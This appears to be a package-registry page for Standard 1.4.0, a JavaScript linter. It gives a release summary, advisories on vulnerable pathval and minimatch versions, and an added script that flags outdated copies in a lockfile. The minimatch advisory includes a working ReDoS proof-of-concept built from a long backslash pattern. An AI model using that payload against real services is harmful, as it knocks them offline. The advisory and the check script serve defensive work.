Standard version 1.4.0 marks a small step from version 1.3.0 in the evolution of this popular JavaScript Standard Style linter. Although the core dependencies remain identical, including glob, jscs, split, jshint, find-root, and minimatch, the update signifies a potential refinement or bug fix. For developers, this means a seamless transition with minimal disruption, keeping the same familiar linting rules and behaviors.
The key difference lies in the releaseDate: version 1.4.0 came one day after 1.3.0. While the absence of listed devDependencies suggests a focus on core linting functionality, the consistent dependencies indicate that the update wasn't about introducing radical changes. It's more likely an incremental improvement, addressing minor issues or polishing existing features.
Developers already using Standard will find the update straightforward, as it doesn't necessitate major configuration changes or code adjustments. Those new to Standard benefit from a stable and predictable linting tool known for its straightforward approach to JavaScript style. Expect no breaking changes, and an easy update path. Overall, upgrading to version 1.4.0 offers a refined experience without overhauling the well-established foundation of JavaScript Standard Style. For new users, especially those seeking a convention-over-configuration style linter, this latest iteration continues to build on the project's reputation for simplicity and maintainability.
All the vulnerabilities related to the version 1.4.0 of the package
Prototype pollution in pathval
A prototype pollution vulnerability affects all versions of package pathval under 1.1.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require("minimatch");
// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  // declare the loop counter locally instead of leaking a global
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};
var exploit = "[!" + genstr(1000000, "\\") + "A";
// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
Update to version 3.0.2 or later.
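To check whether a project still resolves copies below the fixed versions named on this page (minimatch 3.0.2, pathval 1.1.1), the following added example, which is not code from the advisory or from the Standard project, walks a lockfile dependency tree and reports each outdated copy. It assumes the nested "dependencies" layout of an npm lockfileVersion 1 file; the function names and the sample tree are constructed for illustration. The braceExpand advisory is not covered because this page gives no fixed version for it.

```javascript
"use strict";

// Minimum fixed versions, taken from the advisories on this page.
const MIN_FIXED = { minimatch: "3.0.2", pathval: "1.1.1" };

// Compare the numeric major.minor.patch parts of two versions.
// Pre-release and build suffixes are ignored (simplification).
function compareVersions(a, b) {
  const pa = a.split(/[-+]/)[0].split(".").map(Number);
  const pb = b.split(/[-+]/)[0].split(".").map(Number);
  for (let i = 0; i < 3; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  return 0;
}

// Walk a lockfile "dependencies" tree (npm lockfileVersion 1 layout) and
// report every resolved copy that is older than the fixed version.
function findVulnerable(deps, trail = []) {
  const findings = [];
  for (const [name, info] of Object.entries(deps || {})) {
    const path = trail.concat(name);
    const fixed = MIN_FIXED[name];
    if (fixed && compareVersions(info.version, fixed) < 0) {
      findings.push({ path: path.join(" > "), version: info.version, fixed });
    }
    findings.push(...findVulnerable(info.dependencies, path));
  }
  return findings;
}

// Constructed sample lockfile fragment (versions are illustrative only).
const sampleLock = {
  dependencies: {
    standard: {
      version: "1.4.0",
      dependencies: {
        minimatch: { version: "2.0.10" },
        glob: { version: "5.0.15", dependencies: { minimatch: { version: "3.0.4" } } },
      },
    },
    pathval: { version: "1.1.0" },
  },
};

for (const f of findVulnerable(sampleLock.dependencies)) {
  console.log(`${f.path}@${f.version} is below fixed version ${f.fixed}`);
}
```

Because nested copies are reported with their full path, a transitive minimatch pinned by an older dependency is visible even when the top-level copy is already patched.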
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.